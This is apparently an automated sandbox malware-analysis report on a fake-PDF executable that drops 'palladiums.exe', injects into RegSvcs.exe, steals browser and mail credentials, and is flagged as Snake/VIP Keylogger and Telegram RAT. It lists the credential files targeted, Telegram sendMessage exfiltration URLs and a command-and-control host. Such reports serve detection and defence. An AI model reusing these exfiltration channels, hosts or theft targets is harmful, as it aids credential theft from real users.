Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\silvexes\palladiums.exe "C:\Users\user\AppData\Local\silvexes\palladiums.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\silvexes\palladiums.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe

0_2_00260B62

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe

Code function: 0_2_00261663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00261663

Source: Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe, palladiums.exe.0.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe, palladiums.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe

Code function: 0_2_00220698 cpuid

0_2_00220698

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe

Code function: 0_2_00278195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,

0_2_00278195

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe

Code function: 0_2_0025D27A GetUserNameW,

0_2_0025D27A

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe

Code function: 0_2_0023B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

0_2_0023B952

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe

Code function: 0_2_002042DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_002042DE

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 00000007.00000002.4574423762.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4574535869.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.palladiums.exe.e20000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.palladiums.exe.3880000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.palladiums.exe.3880000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.palladiums.exe.e20000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4572292485.0000000000434000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2322323481.0000000000E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2161545218.0000000003880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: palladiums.exe PID: 5812, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6096, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: palladiums.exe PID: 3648, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 4268, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.palladiums.exe.e20000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.palladiums.exe.3880000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.palladiums.exe.3880000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.palladiums.exe.e20000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4572292485.0000000000434000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2322323481.0000000000E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2161545218.0000000003880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: palladiums.exe PID: 5812, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6096, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: palladiums.exe PID: 3648, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior

Source: palladiums.exe	Binary or memory string: WIN_81
Source: palladiums.exe	Binary or memory string: WIN_XP
Source: palladiums.exe.0.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: palladiums.exe	Binary or memory string: WIN_XPe
Source: palladiums.exe	Binary or memory string: WIN_VISTA
Source: palladiums.exe	Binary or memory string: WIN_7
Source: palladiums.exe	Binary or memory string: WIN_8

Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.palladiums.exe.e20000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.palladiums.exe.3880000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.palladiums.exe.3880000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.palladiums.exe.e20000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4572292485.0000000000434000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2322323481.0000000000E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2161545218.0000000003880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4574535869.0000000002C7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: palladiums.exe PID: 5812, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6096, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: palladiums.exe PID: 3648, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 4268, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 00000007.00000002.4574423762.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4574535869.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.palladiums.exe.e20000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.palladiums.exe.3880000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.palladiums.exe.3880000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.palladiums.exe.e20000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4572292485.0000000000434000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2322323481.0000000000E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2161545218.0000000003880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: palladiums.exe PID: 5812, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6096, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: palladiums.exe PID: 3648, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 4268, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.palladiums.exe.e20000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.palladiums.exe.3880000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.palladiums.exe.3880000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.palladiums.exe.e20000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4572292485.0000000000434000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2322323481.0000000000E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2161545218.0000000003880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: palladiums.exe PID: 5812, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6096, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: palladiums.exe PID: 3648, type: MEMORYSTR

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_00281204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	0_2_00281204
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_00281806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	0_2_00281806
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_00571204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	2_2_00571204
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_00571806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	2_2_00571806

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	2 Valid Accounts	1 Native API	111 Scripting	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	4 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Valid Accounts	2 Valid Accounts	13 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	2 Registry Run Keys / Startup Folder	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	127 System Information Discovery	Distributed Component Object Model	21 Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	212 Process Injection	11 Masquerading	LSA Secrets	321 Security Software Discovery	SSH	3 Clipboard Data	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	2 Registry Run Keys / Startup Folder	2 Valid Accounts	Cached Domain Credentials	111 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	24 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	111 Virtualization/Sandbox Evasion	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	212 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	67%	ReversingLabs	Win32.Trojan.AutoitInject
Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	100%	Avira	HEUR/AGEN.1319493
Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\silvexes\palladiums.exe	100%	Avira	HEUR/AGEN.1319493
C:\Users\user\AppData\Local\silvexes\palladiums.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\silvexes\palladiums.exe	63%	ReversingLabs	Win32.Trojan.AutoitInject

Source	Detection	Scanner	Label	Link
http://mail.acadental.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
mail.acadental.com	3.130.71.34	true	true	unknown
reallyfreegeoip.org	104.21.67.152	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	132.226.247.73	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:818225%0D%0ADate%20and%20Time:%2020/12/2024%20/%2005:55:27%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20818225%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:818225%0D%0ADate%20and%20Time:%2019/12/2024%20/%2013:25:24%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20818225%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high
http://checkip.dyndns.org/	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.office.com/	RegSvcs.exe, 00000007.00000002.4574423762.00000000035A2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	RegSvcs.exe, 00000007.00000002.4577761663.00000000043D1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	RegSvcs.exe, 00000007.00000002.4577761663.00000000043D1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org	RegSvcs.exe, 00000003.00000002.4574535869.0000000002C56000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4574423762.000000000349B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	RegSvcs.exe, 00000007.00000002.4577761663.00000000043D1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	palladiums.exe, 00000002.00000002.2161545218.0000000003880000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4572292485.0000000000434000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4574535869.0000000002C56000.00000004.00000800.00020000.00000000.sdmp, palladiums.exe, 00000006.00000002.2322323481.0000000000E20000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4574423762.000000000349B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.office.com/P	RegSvcs.exe, 00000003.00000002.4574535869.0000000002D55000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.office.com/lB	RegSvcs.exe, 00000003.00000002.4574535869.0000000002D5F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4574423762.000000000359D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	RegSvcs.exe, 00000007.00000002.4577761663.00000000043D1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	RegSvcs.exe, 00000003.00000002.4574535869.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4574423762.00000000033B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	RegSvcs.exe, 00000003.00000002.4578047269.0000000003B93000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4577761663.00000000043D1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:818225%0D%0ADate%20a	RegSvcs.exe, 00000003.00000002.4574535869.0000000002C56000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4574423762.000000000349B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	RegSvcs.exe, 00000003.00000002.4574535869.0000000002C56000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4574423762.000000000349B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=en	RegSvcs.exe, 00000007.00000002.4574423762.0000000003571000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4574423762.00000000035A2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	RegSvcs.exe, 00000003.00000002.4578047269.0000000003B93000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4577761663.00000000043D1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://varders.kozow.com:8081	palladiums.exe, 00000002.00000002.2161545218.0000000003880000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4572292485.0000000000434000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4574535869.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, palladiums.exe, 00000006.00000002.2322323481.0000000000E20000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4574423762.00000000033B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mail.acadental.com	RegSvcs.exe, 00000003.00000002.4574535869.0000000002D10000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4574535869.0000000002C7A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4574423762.000000000354E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4574423762.000000000352E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
